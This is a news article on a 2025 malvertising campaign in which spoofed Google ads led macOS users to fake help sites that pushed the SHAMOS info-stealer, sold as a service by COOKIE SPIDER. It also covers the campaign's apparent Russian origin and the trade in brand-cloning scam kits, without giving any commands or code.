Throughout June and August of this year, a sophisticated off-the-shelf malware campaign targeted over 300 organizations. According to cybersecurity company CrowdStrike, the campaign deployed SHAMOS, a malware variant of Atomic macOS Stealer (AMOS) developed by cybercriminal group COOKIE SPIDER.
“Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims,” says Crowdstrike, who blocked the campaign.
The cybercriminals created fake advertisements purporting to come from legitimate companies to direct users to fraudulent macOS help websites, where victims were instructed to execute a malicious one-line installation command. Crowdstrike reports that a Google advertising profile promoting a spoofed macOS help website appeared to be from a legitimate Australia-based electronics store, suggesting the cybercriminals responsible were spoofing the store name in their Google Advertising profile, a process known as “malvertising”.
Malicious one-line installation commands allow cybercriminals to bypass Gatekeeper security checks and install the malware directly onto victims’ devices. SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025, leveraging Google ads to target macOS and Linux devices.
Campaign originated in Russia
Like many orchestrated multiple cyber-attacks, this campaign appears to have originated in Russia. In one attack in June 2025, victims received a promoted malvertising website in their search results. Users located in multiple countries, including the U.S., UK, Japan, China, Colombia, Canada, Mexico, and Italy, received these advertisements. However, no victims were located in Russia.
According to Crowdstrike: “This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia and other countries belonging to the Commonwealth of Independent States (CIS).”
Cybercriminals sharing off-the-shelf tools to masquerade as legitimate organizations is now an established modus operandi in the underworld. As reported by Cyber Intelligence, even global corporations such as British Airways and Microsoft are not immune from having their websites cloned by bad actors. Organized cybercriminal groups now offer scammers off-the-shelf kits enabling them to clone the websites of major brands. These dummy websites are entirely convincing to anyone but trained cyber professionals. Consumers are targeted via email or smartphone messaging and told to check out “unbeatable bargains”. Once they enter their bank account details, the scammers can then drain their bank accounts. Corporate users are also being increasingly targeted to steal company credit card details.
